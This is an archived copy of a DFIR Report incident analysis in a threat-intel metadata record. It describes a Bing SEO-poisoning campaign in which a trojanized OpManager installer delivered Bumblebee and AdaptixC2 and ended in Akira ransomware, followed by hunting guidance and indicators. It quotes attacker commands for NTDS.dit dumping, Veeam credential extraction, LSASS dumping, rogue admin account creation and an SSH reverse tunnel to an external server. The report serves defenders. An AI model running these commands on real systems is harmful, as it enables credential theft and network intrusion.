{
	"id": "c8269a75-6281-4299-bc51-1e0b2813ce8e",
	"created_at": "2026-04-06T00:21:52.495739Z",
	"updated_at": "2026-04-10T13:11:30.258718Z",
	"deleted_at": null,
	"sha1_hash": "409b3329f1526ab9dcd29e529da42ab7669e152a",
	"title": "From Bing Search to Ransomware: Bumblebee and AdaptixC2 Deliver Akira",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 325014,
	"plain_text": "From Bing Search to Ransomware: Bumblebee and AdaptixC2\r\nDeliver Akira\r\nBy editor\r\nPublished: 2025-11-04 · Archived: 2026-04-05 21:51:58 UTC\r\nOverview\r\nBumblebee malware has been an initial access tool used by threat actors since late 2021. In 2023 the malware was\r\nfirst reported as using SEO poisoning as a delivery mechanism. Recently in May of 2025 Cyjax reported on a\r\ncampaign using this method again, impersonating various IT tools. We observed a similar campaign in July in\r\nwhich a download of an IT management tool ended with Akira ransomware.\r\nIn July 2025, we observed a threat actor compromise an organization through this SEO poisoning campaign. A\r\nuser searching for “ManageEngine OpManager” was directed to a malicious website, which delivered a trojanized\r\nsoftware installer. This action led to the deployment of the Bumblebee malware, granting the threat actor initial\r\naccess to the environment. The intrusion quickly escalated from a single infected host to a full-scale network\r\ncompromise.\r\nFollowing initial access, the threat actor moved laterally to a domain controller, dumped credentials, installed\r\npersistent remote access tools, and exfiltrated data using an SFTP client. The intrusion culminated in the\r\ndeployment of Akira ransomware across the root domain. The threat actor returned two days later to repeat the\r\nprocess, encrypting systems within a child domain and causing significant operational disruption across the\r\nenterprise.\r\nThis campaign affected multiple organizations during July as we received confirmation of a similar intrusion\r\nresponded to by the Swisscom B2B CSIRT in which a malicious IT tool dropped Bumblebee and also ended with\r\nAkira ransomware deployment.\r\nOur customers received notice of this campaign in early July followed by a private threat brief report. 
If you are\r\ninterested in the full report or additional IOCs please contact us.\r\nPrivate Threat Briefs: 20+ private DFIR reports annually.\r\nThreat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver,\r\netc.\r\nAll Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, Threat Actor\r\nInsights reports, long-term tracking, data clustering, and other curated intel.\r\nPrivate Sigma Ruleset: Features 170+ Sigma rules derived from 50+ cases, mapped to ATT\u0026CK with test\r\nexamples.\r\nDFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions.\r\nInteractive labs are available with different difficulty levels and can be accessed on-demand,\r\naccommodating various learning speeds.\r\nhttps://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/\r\nPage 1 of 7\n\nContact us today for pricing or a demo!\r\nThis intrusion began when a user, searching for “ManageEngine OpManager” on Bing, was directed to the\r\nmalicious site opmanager[.]pro.\r\nThe user downloaded a trojanized MSI installer, ManageEngine-OpManager.msi, which, upon execution, installed\r\nthe legitimate software while simultaneously loading the Bumblebee malware msimg32.dll via consent.exe.\r\nThe Bumblebee malware established command and control (C2) with 109.205.195[.]211:443 and\r\n188.40.187[.]145:443 using DGA domains.\r\nBy targeting IT management tools and software in both our intrusion and the one observed by Swisscom B2B\r\nCSIRT, the users executing the malware were highly privileged IT administrator accounts within Active Directory.\r\nThis provided easy privileged access to the threat actors for their next actions.\r\nApproximately five hours after this initial execution, Bumblebee deployed an 
AdaptixC2 beacon (AdgNsy.exe),\r\nwhich established a new C2 channel to 172.96.137[.]160:443. The threat actor then initiated internal\r\nreconnaissance using built-in Windows utilities, including systeminfo, nltest /dclist:, whoami /groups, and net\r\ngroup domain admins /dom.\r\nFollowing this, the threat actor created two new domain accounts, backup_DA and backup_EA, and added\r\nthe latter to the “Enterprise Administrators” group. Using the privileged backup_EA account, the threat actor\r\nconnected to a domain controller via RDP and dumped the NTDS.dit file using wbadmin.exe.\r\nwbadmin.exe start backup -backuptarget:\\\\127.0.0.1\\C$\\ProgramData\\ -include:\"C:\\windows\\NTDS\\ntds.dit\r\nFor persistence and re-entry, the threat actor installed the RustDesk remote access tool on several hosts. In a\r\nsubsequent session, the threat actor established an SSH tunnel to an external server at 193.242.184[.]150 to proxy\r\ntheir activity.\r\nssh root@193.242.184.150 -R *:10400 -p22\r\nThey continued discovery by deploying a renamed SoftPerfect network scanner (n.exe). Following this, they\r\ntargeted a backup server, and attempted to dump credentials from the Veeam PostgreSQL database.\r\npsql.exe -U postgres --csv -d VeeamBackup -w -c \"SELECT user_name,password,description,change_time_ut\r\nAround the same time, the threat actor installed FileZilla on a file server and exfiltrated data via SFTP to\r\n185.174.100[.]203.\r\nThey performed LSASS memory dumping on multiple workstations using rundll32.exe with comsvcs.dll using a\r\ncombination of remote services and WMI. 
The threat actor then deployed the Akira ransomware payload,\r\nlocker.exe, and executed it with various command-line options to encrypt local and remote network shares as well as other\r\ndirectories on remote hosts.\r\nTwo days after this first ransomware deployment, the threat actor returned via RustDesk, connected to a child\r\ndomain controller, and performed another round of discovery using Invoke-ShareFinder and DNS zone export\r\ncommands, before deploying Akira ransomware to the child domain.\r\nTime to the first round of ransomware (TTR) was just shy of 44 hours after initial access. Swisscom B2B CSIRT\r\nreported an even faster TTR of just nine hours from initial access.\r\nDuring our investigation of the OpManager site, we identified two additional websites that appear to be\r\ndistributing trojanized installers for Axis Camera tools and Angry IP Scanner. Refer to the IOC section for further\r\ndetails.\r\nDetection Engineering and Threat Hunting (DEATH)\r\nHunt for MSI installations from user directories followed by suspicious child processes:\r\nMonitor msiexec.exe executing from user Desktop/Downloads\r\n(C:\\Users\\*\\Desktop\\*.msi, C:\\ProgramData\\*.msi) and spawning unexpected children like consent.exe or\r\nunusual image load events for msimg32.dll.\r\nReview unusual MSI packages with suspicious names: Look for MSI files with generic names\r\nlike ManageEngine-OpManager.msi or rustdesk-*.msi downloaded to user directories. Is this software\r\ngenerally allowed in your environment? Is this a commonly used remote access tool for your users? 
Does\r\nthe software being installed make sense for the user's job role?\r\nCredential Access\r\nHunt for LSASS memory dumping via comsvcs.dll with tasklist enumeration:\r\ncmd.exe /Q /c for /f \"tokens=1,2 delims= \" %%A in ('\"tasklist /fi \"Imagename eq lsass.exe\" | find \"ls\r\nDetect LSASS dumps with unusual file extensions: Monitor rundll32.exe comsvcs.dll #+000024 writing\r\nto \\Windows\\Temp\\ with non-standard extensions like .sys, .docx, .avhdx\r\nMonitor PostgreSQL credential extraction from Veeam databases:\r\npsql.exe -U postgres --csv -d VeeamBackup -w -c \"SELECT user_name,password,description,change_time_ut\r\nMonitor wbadmin abuse for NTDS.dit/Hive dumping:\r\nwbadmin start backup -backuptarget:\\\\127.0.0.1\\C$\\ProgramData\\ -include:\"C:\\windows\\NTDS\\ntds.dit,C:\\\r\nDiscovery\r\nHunt for rapid domain enumeration sequences within short time-frames (\u003c 5 minutes):\r\ncmd.exe\r\n├── systeminfo.exe\r\n├── nltest.exe /dclist:\r\n├── nltest.exe /domain_trusts\r\n├── whoami.exe /groups\r\n├── net.exe group \"domain admins\" /dom\r\n└── net.exe group \"enterprise admins\" /dom\r\nMonitor for DNS zone exports targeting multiple domains: Look for Export-DnsServerZone commands\r\ntargeting _msdcs.*, and TrustAnchors within the same session\r\nPersistence \u0026 Privilege Escalation\r\nDetect domain user creation followed by immediate privilege escalation via net utility commands:\r\nnet user backup_EA P@ssw0rd1234 /add /dom\r\nnet group \"enterprise admins\" backup_EA /add /dom\r\nHunt for backup account creation with predictable naming patterns: Monitor net user\r\nbackup_* or backup_EA/backup_DA account creation followed by admin group additions\r\nCommand \u0026 Control\r\nMonitor for SSH reverse tunneling to external IPs:\r\nssh root@\u003cexternal_ip\u003e -R *:10400 -p22\r\nHunt for Bumblebee DGA patterns: Look for 
multiple DNS queries to domains matching pattern [8-14\r\nrandom chars].org (e.g., ev2sirbd269o5j[.]org, ijt0l3i8brit6q[.]org) within seconds of each other.\r\nLateral Movement\r\nHunt for RDP logons using newly created accounts: Monitor Type 10 (RemoteInteractive) logons from compromised internal\r\nsystems using accounts like backup_EA\r\nDetect suspicious inter-system authentication patterns: Look for authentication from initial access\r\nsystems to domain controllers within hours of account creation\r\nData Collection \u0026 Exfiltration\r\nHunt for FileZilla installation on servers followed by large outbound transfers:\r\nDetect FileZilla_*_setup.exe execution on server systems, especially when followed by significant network\r\ntraffic\r\nLook for data staging in ProgramData: Monitor file writes to C:\\ProgramData\\shares.txt,\r\nC:\\ProgramData\\*.txt containing reconnaissance output\r\nDefense Evasion\r\nDetect case variation in command execution: Hunt for mixed-case command invocations\r\nlike Cmd.eXE, CmD.Exe which may indicate evasion attempts\r\nBehavioral Correlation Rules\r\nMulti-stage attack progression: Alert when a single system exhibits: MSI installation → discovery\r\ncommands → credential access → lateral movement within 24 hours\r\nCross-system activity correlation: Hunt for accounts created on one system and immediately used for\r\nauthentication on another (\u003c= 5mins)\r\nTool deployment patterns: Monitor for remote access tool installation (RustDesk) followed by SSH\r\ntunneling activity from the same network segment\r\nIndicators of Compromise (IOCs)\r\nDomains:\r\nev2sirbd269o5j.org (Bumblebee DGA domain)\r\n2rxyt9urhq0bgj.org (Bumblebee DGA domain)\r\nDFIR Report:\r\nopmanager[.]pro (Malicious site for trojanized installer)\r\nangryipscanner.org (Malicious site for trojanized installer)\r\naxiscamerastation.org (Malicious site 
for trojanized installer)\r\nSwisscom B2B CSIRT:\r\nip-scanner[.]org (Malicious site for trojanized installer)\r\nIP Addresses:\r\n109.205.195[.]211 (Bumblebee C2)\r\n188.40.187[.]145 (Bumblebee C2)\r\nDFIR Report:\r\n172.96.137[.]160 (AdaptixC2 C2)\r\nSwisscom B2B CSIRT:\r\n170.130.55[.]223 (AdaptixC2 C2)\r\nDFIR Report:\r\n193.242.184[.]150 (SSH Tunnel Host)\r\nSwisscom B2B CSIRT:\r\n83.229.17[.]60 (SSH Tunnel Host)\r\n185.174.100[.]203 (SFTP Exfiltration Server)\r\nFile Hashes:\r\nDFIR Report:\r\nManageEngine-OpManager.msi\r\n186b26df63df3b7334043b47659cba4185c948629d857d47452cc1936f0aa5da (Malicious installer)\r\nSwisscom B2B CSIRT:\r\nAdvanced-IP-Scanner.msi\r\na14506c6fb92a5af88a6a44d273edafe10d69ee3d85c8b2a7ac458a22edf68d2 (Malicious installer)\r\nDFIR Report:\r\nmsimg32.dll\r\na6df0b49a5ef9ffd6513bfe061fb60f6d2941a440038e2de8a7aeb1914945331 (Bumblebee)\r\nSwisscom B2B CSIRT:\r\nmsimg32.dll\r\n6ba5d96e52734cbb9246bcc3decf127f780d48fa11587a1a44880c1f04404d23 (Bumblebee)\r\nDFIR Report:\r\nlocker.exe\r\nde730d969854c3697fd0e0803826b4222f3a14efe47e4c60ed749fff6edce19d (Akira ransomware)\r\nSwisscom B2B CSIRT:\r\nwin.exe\r\n18b8e6762afd29a09becae283083c74a19fc09db1f2c3412c42f1b0178bc122a (Akira ransomware)\r\n#TB36726\r\nSource: https://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2025/11/04/from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2/"
	],
	"report_names": [
		"from-bing-search-to-ransomware-bumblebee-and-adaptixc2-deliver-akira-2"
	],
	"threat_actors": [
		{
			"id": "8c8fea8c-c957-4618-99ee-1e188f073a0e",
			"created_at": "2024-02-02T02:00:04.086766Z",
			"updated_at": "2026-04-10T02:00:03.563647Z",
			"deleted_at": null,
			"main_name": "Storm-1567",
			"aliases": [
				"Akira",
				"PUNK SPIDER",
				"GOLD SAHARA"
			],
			"source_name": "MISPGALAXY:Storm-1567",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "910b38e9-07fe-4b47-9cf4-e190a07b1b84",
			"created_at": "2024-04-24T02:00:49.516358Z",
			"updated_at": "2026-04-10T02:00:05.309426Z",
			"deleted_at": null,
			"main_name": "Akira",
			"aliases": [
				"Akira",
				"GOLD SAHARA",
				"PUNK SPIDER",
				"Howling Scorpius"
			],
			"source_name": "MITRE:Akira",
			"tools": [
				"Mimikatz",
				"PsExec",
				"AdFind",
				"Akira _v2",
				"Akira",
				"Megazord",
				"LaZagne",
				"Rclone"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434912,
	"ts_updated_at": 1775826690,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.pdf",
		"text": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.txt",
		"img": "https://archive.orkl.eu/409b3329f1526ab9dcd29e529da42ab7669e152a.jpg"
	}
}